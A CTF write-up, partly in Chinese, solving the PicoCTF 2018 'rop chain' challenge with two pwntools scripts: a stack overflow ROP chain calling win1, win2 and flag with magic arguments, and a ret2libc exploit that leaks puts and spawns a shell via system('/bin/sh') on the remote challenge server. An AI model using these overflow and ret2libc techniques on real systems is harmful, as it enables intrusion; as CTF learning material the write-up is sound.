main里面有个gets溢出函数,再点开flag函数看
可以看到传入了一个a1参数,如果win1和win2都是1且a1为-559039827时会输出flag的值
用十六进制比较,该数的十六进制可以直接在IDA里面看到
看到win1函数设置了win1为1,win2函数需要再传入一个参数为-1163220307那么win2就是1了
这个参数的十六进制为0x0BAAAAAAD
exp
from pwn import *
#io=process('./PicoCTF_2018_rop_chain')
# Remote challenge instance (BUUOJ mirror of PicoCTF 2018 "rop chain"); the
# commented-out process() line above is the local-binary alternative.
io = remote('node5.buuoj.cn',27645)
# Echo every byte sent and received; handy while checking the chain, noisy otherwise.
context.log_level='debug'
# Fixed addresses of the target's own functions (32-bit, no PIE — taken from the
# IDA listing the writeup refers to). Per the writeup, flag() prints the flag only
# when win1 and win2 are both set and its argument equals 0xDEADBAAD
# (-559039827 as a signed 32-bit int).
flag=0x0804862B
win1=0x080485CB
# win2() sets its flag only when called with 0xBAAAAAAD (-1163220307).
win2=0x080485D8
a11=0xBAAAAAAD
a12=0xDEADBAAD
# NOTE(review): `exit` shadows the Python builtin; a name such as exit_addr would
# avoid surprises if exit() is ever called later in the script.
exit=0x08048470
# gets() overflow in main: 0x18+4 bytes of padding (buffer plus, presumably, the
# saved frame pointer), then the saved return address becomes win1. Each ret pops
# the next slot: win1 -> win2 -> flag. On 32-bit x86 cdecl a callee's first
# argument sits just past its return address, so a11 is win2's argument and a12
# is flag's (a11 doubles as flag's never-used return address); exit comes last.
payload=cyclic(0x18+4)+p32(win1)+p32(win2)+p32(flag)+p32(a11)+p32(a12)+p32(exit)
io.sendline(payload)
# Hand the connection to the terminal to read the flag output.
io.interactive()
其实这题用libc也可以的
exp
from pwn import *
from LibcSearcher import *
#io=process('./PicoCTF_2018_rop_chain')
# Remote challenge instance; the commented-out process() line above is the
# local-binary alternative.
io=remote('node5.buuoj.cn',26230)
context.log_level='debug'
# Parse the local copy of the binary to resolve symbols; no PIE, so these are
# also the runtime addresses.
elf = ELF('./PicoCTF_2018_rop_chain')
main = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# NOTE(review): unused in this script (left over from the first exploit).
flag=0x0804862B
# Stage 1: overflow into puts(puts_got) to leak the resolved libc address of
# puts, with main as puts' return address so a second overflow can be sent.
payload1 = cyclic(0x18+4) + p32(puts_plt) + p32(main) + p32(puts_got)
io.sendline(payload1)
# Read up to the byte 0xf7 and take the last 4 bytes as the leaked pointer — this
# assumes the little-endian leak has 0xf7 as its top byte (the usual 32-bit libc
# mapping). NOTE(review): on Python 3 pwntools encodes the str pattern for you;
# b'\xf7' would state the bytes intent explicitly.
puts = u32(io.recvuntil('\xf7')[-4:])
print(hex(puts))
# LibcSearcher (third-party) matches the remote libc from the leaked puts
# address; its symbol offsets give the base and the two addresses used below.
libc = LibcSearcher('puts',puts)
libc_base = puts - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
# Stage 2: same overflow, now returning into system with the "/bin/sh" string
# as its argument and main as the (unused) return address.
payload2 = cyclic(0x18+4) + p32(system_addr) + p32(main) + p32(binsh_addr)
io.sendline(payload2)
io.interactive()